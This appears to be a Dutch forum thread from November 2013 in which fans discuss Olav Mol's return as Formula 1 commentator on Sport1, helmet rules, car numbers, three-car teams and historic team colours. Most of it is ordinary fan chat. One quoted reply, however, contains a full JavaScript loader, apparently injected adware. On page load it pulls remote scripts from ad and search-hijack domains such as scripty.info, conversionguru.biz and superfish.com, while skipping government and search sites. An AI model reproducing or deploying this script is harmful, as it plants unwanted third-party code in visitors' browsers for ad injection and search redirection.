quote:Op maandag 25 november 2013 15:34 schreef IkWilbert het volgende:
Olav Mol komt terugPersoonlijk erg blij mee
http://www.gpupdate.net/n(...)entator-bij-sport-1/
quote:Inmiddels zijn de banden weer aangehaald en mag Mol ook vanaf de circuits zelf verslag doen.
Overigens zal Sport 1 volgend seizoen ook de GP2 en GP3 uitzenden.
JAAAAAAAAAAAAAAquote:Op maandag 25 november 2013 15:34 schreef IkWilbert het volgende:
Olav Mol komt terugPersoonlijk erg blij mee
http://www.gpupdate.net/n(...)entator-bij-sport-1/
Donderstraal een eind op. Als je elke race wilt horen hoe geweldig Button en Lewis en di Resta wel niet zijn dan kijk je maar naar de BBC ofzo.quote:
Drup is toch ook beter dan regen? Maar ik vind Mol gewoon ook niets meer, hij mag van mij met pensioen. Er moet toch ergens in Nederland iemand rondlopen die enthousiast én capabel is en het stokje kan overnemen?quote:Op maandag 25 november 2013 16:16 schreef Geralt het volgende:
[..]
Donderstraal een eind op. Als je elke race wilt horen hoe geweldig Button en Lewis en di Resta wel niet zijn dan kijk je maar naar de BBC ofzo.
Olav is een stuk beter te pruimen dan van Dam. En dat is een feit.
Blij dattie terug is
dan neem ik toch weer een abbo op sport1quote:Op maandag 25 november 2013 16:11 schreef Fiorano het volgende:
Heuh, mss toch maar Sport1 abbo nemen dan avanaf volgend seizoen
Mee eens, is misschien een kleine verbetering maar geen enorme stapquote:Op maandag 25 november 2013 16:22 schreef Gebraden_Wombat het volgende:
[..]
Drup is toch ook beter dan regen? Maar ik vind Mol gewoon ook niets meer, hij mag van mij met pensioen. Er moet toch ergens in Nederland iemand rondlopen die enthousiast én capabel is en het stokje kan overnemen?
Alard Kalff in een racepak met zo'n antenne op zn rug door de pits laten rennenquote:Op maandag 25 november 2013 16:23 schreef Geralt het volgende:
Mol is capabel. Alleen de laatste jaren zat hij niet op locatie en in zn uppie. Alleen al door het niet op locatie zitten krijg je minder mee.
Ik vind trouwens wel dat ze er iemand bij moeten zetten. 2 zien altijd meer dan 1.
Mij is de laatste pakweg tien jaar op gaan vallen dat Mol z'n manier van verslag geven is veranderd, in fragmenten van 15-20 jaar geleden hoor ik vaker een andere, objectievere Mol.quote:Op maandag 25 november 2013 16:23 schreef Geralt het volgende:
Mol is capabel. Alleen de laatste jaren zat hij niet op locatie en in zn uppie. Alleen al door het niet op locatie zitten krijg je minder mee.
Ik vind trouwens wel dat ze er iemand bij moeten zetten. 2 zien altijd meer dan 1.
quote:Op maandag 25 november 2013 15:34 schreef IkWilbert het volgende:
Olav Mol komt terugPersoonlijk erg blij mee
http://www.gpupdate.net/n(...)entator-bij-sport-1/
Zware achteruitgang dus, co-commentatoren waren nog wel prima.quote:Op maandag 25 november 2013 16:07 schreef Gramulanion het volgende:
Van Dam mag de vrije trainingen blijven doen.
En geen co-commentatoren meer.
Dat niet. Het probleem is juist dat hij het niet snapt, met zijn enthousiasme maakt hij het dan nog deels goed.quote:Op maandag 25 november 2013 16:38 schreef Kleffe_Dop het volgende:
[..]
Mij is de laatste pakweg tien jaar op gaan vallen dat Mol z'n manier van verslag geven is veranderd, in fragmenten van 15-20 jaar geleden hoor ik vaker een andere, objectievere Mol.
Zijn laatste jaren vond ik hem meer overkomen als een los geslagen fan in plaats van een objectieve verslaggever. Om de zin gebruik makend van zelfverzonnen woorden ("DOE DAT DAN NIET KOEKIE") of raar taalgebruik ("Poepstart"- "Kneiterhard") en in toenemende mate scheldwoorden (Je kan als commentator echt geen FUCK lopen roepen op tv).
Haal dat eruit en Mol heeft voldoende kennis en talent om verslag te geven van een Grand Prix.
Ja, MAARquote:Op maandag 25 november 2013 15:34 schreef IkWilbert het volgende:
Olav Mol komt terugPersoonlijk erg blij mee
http://www.gpupdate.net/n(...)entator-bij-sport-1/
Gemiste kans van Sport1, ze hadden gewoon de SKY uitzending over moeten nemen, ook met een behoorlijke commentator (al vind ik Mol dat niet) blijft het gewoon behelpen.quote:Op maandag 25 november 2013 17:03 schreef Marks het volgende:
[..]
Ja, MAAR
er moet WEL een andere naast hem zitten, want hij mist ook gewoon veel enzo. En 2 zien gewoon altijd meer dan 1, zo simpel is het.
Ook niet, gewoon NL.quote:Op maandag 25 november 2013 17:05 schreef Tarado het volgende:
[..]
Gemiste kans van Sport1, ze hadden gewoon de SKY uitzending over moeten nemen, ook met een behoorlijke commentator (al vind ik Mol dat niet) blijft het gewoon behelpen.
Het is een vak, zeker niet makkelijk maar waarom kijk ik graag BBC, is niet alleen om het commentaar maar ook het randprogramma.quote:Op maandag 25 november 2013 17:24 schreef Sally het volgende:
Bied jezelf aan, zou ik zeggenOpen sollicitatiebrieven worden vast wel gewaardeerd.
(aan eenieder die zich aangesproken voelt)
* Sally too.quote:Op maandag 25 november 2013 17:29 schreef Tarado het volgende:
[..]
Het is een vak, zeker niet makkelijk maar waarom kijk ik graag BBC, is niet alleen om het commentaar maar ook het randprogramma.
quote:Gelukkig kan ik het doen met Engels (en ik kijk wel tussen de regels door als men een Brit (of Schot) ophemelt). BBC of stream: het maakt me nu niks meer uit. De SkySports stream is prima te pruimen, helaas wel veel reclame buiten de echte race om, maar ja: voor niets gaat alleen de zon nog op in deze tijd.
Edit: maar leuk voor de Nederlandse F1-fans![]()
![]()
![]()
Dat kan echt niet.quote:
Wat nou lekken. Het is mijn eigen tekst. ZONDER link ook nog.quote:
Een paar gekeken net! Kan me niet herinneren dat ik ze ooit eerder had gezien?quote:Op maandag 25 november 2013 21:54 schreef SimtekF1 het volgende:
Iemand deze filmpjes toevallig al gezien? (allerlei RTL5 voorbeschouwingen uit 1994 en 1995.
Ik krijg spontaan heimwee als ik dit terug zie.
Niet alleen de voorbeschouwing, maar ook gewoon de coureurs, de auto's, het spektakel.. zucht!
http://www.youtube.com/pl(...)4CcVCyVFZhZ7YK98PS_h
LOLquote:Op maandag 25 november 2013 23:34 schreef JohnB52 het volgende:
[..]
Een paar gekeken net! Kan me niet herinneren dat ik ze ooit eerder had gezien?
Wel heel gaaf om terug te zien, maar wat is alles veranderd zeg!
Dat was nog voor Ruud ter Weijden volgens mij.quote:Op maandag 25 november 2013 21:54 schreef SimtekF1 het volgende:
Iemand deze filmpjes toevallig al gezien? (allerlei RTL5 voorbeschouwingen uit 1994 en 1995.
Ik krijg spontaan heimwee als ik dit terug zie.
Niet alleen de voorbeschouwing, maar ook gewoon de coureurs, de auto's, het spektakel.. zucht!
http://www.youtube.com/pl(...)4CcVCyVFZhZ7YK98PS_h
Absoluut, dat was rond rond 2000/2003 periode volgens mij.quote:Op dinsdag 26 november 2013 08:06 schreef Geralt het volgende:
[..]
Dat was nog voor Ruud ter Weijden volgens mij.
twitter:Olav_Mol twitterde op dinsdag 26-11-2013 om 11:28:49F1 2014. Bring it on. Vanaf 1dec trouwens op Sport1 de hele winter portretten en iv;s met oude helden als oa Hakkinen, Stewart, Fittipaldi reageer retweet
Ow dat is natuurlijk om te voorkomen dat mensen hun abbo opzeggen gedurende de winterquote:Op dinsdag 26 november 2013 11:32 schreef Tarado het volgende:
twitter:Olav_Mol twitterde op dinsdag 26-11-2013 om 11:28:49F1 2014. Bring it on. Vanaf 1dec trouwens op Sport1 de hele winter portretten en iv;s met oude helden als oa Hakkinen, Stewart, Fittipaldi reageer retweet
Helemaal mee eens! Ook steeds als een coureur een foutje maakt honderd keer roepen hoe dom die eigenlijk wel niet is en zo (en dan blijkt het achteraf een technisch mankement te zijn geweest). Precies ja, een losgeslagen fan in plaats van een objectieve verslaggever. Zal wel mee moeten zakken met het RTL en SBS niveau of zo....quote:Op maandag 25 november 2013 16:38 schreef Kleffe_Dop het volgende:
[..]
Mij is de laatste pakweg tien jaar op gaan vallen dat Mol z'n manier van verslag geven is veranderd, in fragmenten van 15-20 jaar geleden hoor ik vaker een andere, objectievere Mol.
Zijn laatste jaren vond ik hem meer overkomen als een los geslagen fan in plaats van een objectieve verslaggever. Om de zin gebruik makend van zelfverzonnen woorden ("DOE DAT DAN NIET KOEKIE") of raar taalgebruik ("Poepstart"- "Kneiterhard") en in toenemende mate scheldwoorden (Je kan als commentator echt geen FUCK lopen roepen op tv).
Haal dat eruit en Mol heeft voldoende kennis en talent om verslag te geven van een Grand Prix.
De BBC kijkt nog wel wat verder dan hun eigen coureurs gelukkig, bij RTL komen ze al helemaal niet verder dan Vettel, Nico & Nico en Zjoetiel.quote:Op maandag 25 november 2013 16:16 schreef Geralt het volgende:
Donderstraal een eind op. Als je elke race wilt horen hoe geweldig Button en Lewis en di Resta wel niet zijn dan kijk je maar naar de BBC ofzo.
Vind ik inderdaad ook wel meevallen, alleen als ze winnen komt de kwijl je tv uit maar daar hebben we de laatste tijd weinig last vanquote:Op dinsdag 26 november 2013 18:05 schreef Ferry_76 het volgende:
[..]
De BBC kijkt nog wel wat verder dan hun eigen coureurs gelukkig, bij RTL komen ze al helemaal niet verder dan Vettel, Nico & Nico en Zjoetiel.
ik heb mijn abbo 2 november al opgezegd. Bij ziggo zit 1 maand opzegtermijn in. Dus vanaf 2 december heb ik geen sport1 meer.... tot aan Melbourne.quote:Op dinsdag 26 november 2013 17:37 schreef Geralt het volgende:
[..]
Ow dat is natuurlijk om te voorkomen dat mensen hun abbo opzeggen gedurende de winter
Ik neem het wel weer als het circus weer in Melbourne aanbeland is
Ik zie dat ze de wagen van dit jaar er ook al hebben staanquote:Op dinsdag 26 november 2013 19:29 schreef Geralt het volgende:
https://maps.google.co.uk(...)p=12,107.64,,0,18.29
Met streetview door het McLaren Technology Centre wandelen
Ik hoop wel dat hij dan vanaf lokatie gaat uitzenden, liefste nog met pitreporterquote:Op dinsdag 26 november 2013 19:28 schreef Fer het volgende:
Gewoon oldskool, die Mol met zijn stem over zo;n gare telefoonverbinding zoals vroeger. Snapte als klein kind nooit waarom mooi beeld was en dan zo;n telefoonstem erbij.
Denk wel dat hij door het hele weekend daar rond te hangen veel meer info kan oppikken over hoe het de rijders vergaat in de trainingen. En later kan verklaren waarom sommige rijders tijdens de race op bepaalde stukken sneller is of langzamer.
Hoe lang de zachte banden meegaan enz.
quote:Op dinsdag 26 november 2013 20:35 schreef Gebraden_Wombat het volgende:
[..]
Ik zie dat ze de wagen van dit jaar er ook al hebben staan![]()
[ afbeelding ]
Inderdaad ja, die hebben die enorme loods waar ze alles achter slot en grendel bewaren. Slecht voorbeeld dus.quote:Op woensdag 27 november 2013 00:59 schreef Waffle het volgende:
Volgens mij verkoopt Mclaren al jaren geen auto's meer.
Zou ook wel jammer zijn want er zitten best mooie helmen bij.quote:Op donderdag 14 november 2013 21:57 schreef Marks het volgende:
[..]
Mooi dat de FIA daar wat tegen wil doen, zo vaak van helm wisselen.
Lijkt me ook veel beter.quote:Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:
[..]
Zou ook wel jammer zijn want er zitten best mooie helmen bij.
Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
wie herinnert zich niet Nigel Mansel met z'n rode 5 op z'n wagen?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
Ik hoop er in januari te zijn, zal dan wel verslag doen. Meer informatie op:quote:A survey of the career of Fernando Alonso, the premier Formula 1 Spanish racing driver of all time and winner of two world championships.
Alonso began competing when he was only three years old, and the exhibition includes the first racing suit he wore, hand-sewn by his mother. And from that first moment through to his victory in two Formula 1 world championships, and in numerous other races, whose trophies are all on display to visitors. The exhibition also includes several of the single-seaters raced by the Asturian champion: from his first go-kart through to the cars with which he competed for Minardi, Renault, McLaren and Ferrari. Visitors can also see a collection of helmets, boots, gloves and mementos from Alonso's racing career.
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.quote:Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:
[..]
Zou ook wel jammer zijn want er zitten best mooie helmen bij.
Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
wie herinnert zich niet Nigel Mansel met z'n rode 5 op z'n wagen?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
Kan toch niet.. ...quote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Senna reed best vaak met nummer 1 of 11quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nemmering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Hoezo kan dat niet ? Wees eens duidelijkerquote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben door zijn gehele carrière.quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
of zoals in de VS iedere auto een redelijk vast nummer heeft.quote:Op woensdag 27 november 2013 10:36 schreef Racerblade het volgende:
[..]
Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben.
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?quote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Of dus zoals in de DTM, waar iedere rijder met een eigen 'livery' rijdt. Volgens mij is de F1 nog één van de weinige klasses waar het niet mag. Iedereen weet nog wel dat Pollock 2 verschillende auto's wilde en een stukje autosport geschiedenis schreef met de rits-wagens.quote:Op woensdag 27 november 2013 10:37 schreef Peterselieman het volgende:
[..]
of zoals in de VS iedere auto een redelijk vast nummer heeft.
Nee wist ik nietquote:Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:
[..]
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?
[ afbeelding ]
Was ook alleen maar omdat Enzo Ferrari overhoop lag met de Italiaanse autosport bond en schreef voor een aantal GP's in de wagens in onder Ferrari Noord Amerika in de Noord Amerikaanse kleuren (blauw/wit).quote:
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoerenquote:Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:
[..]
Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien
Wat een gezeur over zo'n helm, ik vind het wel grappig dat Vettel dit doet, kneuterigheid ten top om dat te willen verbieden.quote:Op woensdag 27 november 2013 10:32 schreef Marks het volgende:
[..]
Kan toch niet.. ...
En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Omdat er nu genoeg auto's zijn. Ik geloof dat er in de contracten met de circuits staat dat er minimaal 20 auto's aan de start moeten staan. Die 3 auto's is voor het geval er minder dan 10 teams aan de start verschijnen, als er teams zich uit de F1 terug trekken door de te hoge kosten.quote:Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:
[..]
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren
Met 3 auto's worden de kosten voor de teams NOG hoger, en de meeste kunnen hun budget nu al niet of nauwelijks rond krijgen.quote:Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:
[..]
Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren
Nouja traditie. Alleen Ferrari rijdt nog in rood. Vroeger was het traditie ja, maar dat is al lang niet meer.quote:Op woensdag 27 november 2013 13:41 schreef Marks het volgende:
Het gaat toch om een fundamentele traditie binnen de F1, de teamkleuren.
En een gele sharknose, met gendebien.quote:Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:
[..]
Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?
[ afbeelding ]
Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.quote:Op woensdag 27 november 2013 16:38 schreef Schunckelstar het volgende:
[..]
En een gele sharknose, met gendebien.
Weet alleen niet of dat officieel van het fabrieksteam was
Ahquote:Op woensdag 27 november 2013 16:50 schreef sasquatsch het volgende:
[..]
Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.
Hier staan alle kleurenquote:Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:
Vroeger was het duitsland zilver, engeland groen, italie blauw etc.
Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
Gquote:Op woensdag 27 november 2013 08:07 schreef Wombcat het volgende:
[..]
Lijkt me ook veel beter.
Maar nadeel van een groot duidelijk nummer zal wel zijn dat dat ten koste gaat van de reclamemogelijkheden. Het nummer staat dan op een goed zichtbare plaats en is dan groter, die ruimte verkopen ze waarschijnlijk liever aan een sponsor.
quote:
Bijnaam van het Italiaanse nationale elftal is Azzurri, azuurblauw, dusquote:
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.quote:Op woensdag 27 november 2013 22:50 schreef WEST het volgende:
[..]
G
McLaren deed het wel goed toen Mika, Hakkinen, coulthard en montoya er reden. Gewoon hun voornaam op zijkant in de steil van WEST. was oook wel mooi trouwens.
[ afbeelding ]
Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.quote:Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:
[..]
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
Dat dan weer wel, ja.quote:Op woensdag 27 november 2013 23:10 schreef WEST het volgende:
[..]
Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.
Destijds vond ik de vervangende reclame van lucky strike eigenlijk beterquote:Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:
[..]
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
Uh what?quote:Op donderdag 28 november 2013 00:35 schreef Marks het volgende:
[..]
<script>
var id=2605802023;
var aff=30500;
var sid=10;
(function()
{
var hostname = document.location.hostname;
function addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}
function checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function loadScript(src, scriptId, innerText)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
if (typeof(innerText) !== 'undefined')
{
if(script.innerText)
script.innerText = innerText;
else
script.textContent = innerText;
}
(document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script);
}
function onloadComplete()
{
if (hostname.length - hostname.indexOf('.gov') == 4 ||
document.getElementsByTagName("*").length < 100)
return;
if (!checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.conversionguru.biz',
sttc: 'https://scripty.info/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
loadScript('https://scripty.info/scripts/inl_dmmtch/inl_dmmtch.js');
loadScript('https://colo.cachefly.net/js/min.inject.js?id=ODEqPCA&subid=36');
loadScript('http://ig.cleversearch.me:8080/adserver/static/js/inimage_s.js?pid=108&ext_domain=1&ox_subId=js36');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://intext.nav-links.com/js/intext.js?afid=DheeraMedia&subid=js36&maxlinks=6&linkcolor=009900');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://www.superfish.com/ws/sf_main.jsp?dlsource=mhaencb&userId=ws&CTID=js36');
}
loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 3, rel : 1, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.conversionguru.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://scripty.info/scripts/adbar' };
loadScript('https://scripty.info/scripts/adbar/adbar.js');
loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
}
if (top === self)
{
if (document.readyState === 'complete')
onloadComplete();
else
addEventHandler(window, 'load', onloadComplete);
}();
</script>
F1 hoeft niet gered te worden hoor, niet in dit opzicht.
twitter:adamcooperf1 twitterde op donderdag 28-11-2013 om 10:27:52#F1 Brawn leaves Wolff and Lowe in charge of Mercedes: http://t.co/iNgXPyZT0C reageer retweet
Caterham is groen.quote:Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:
Vroeger was het duitsland zilver, engeland groen, italie blauw etc.
Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |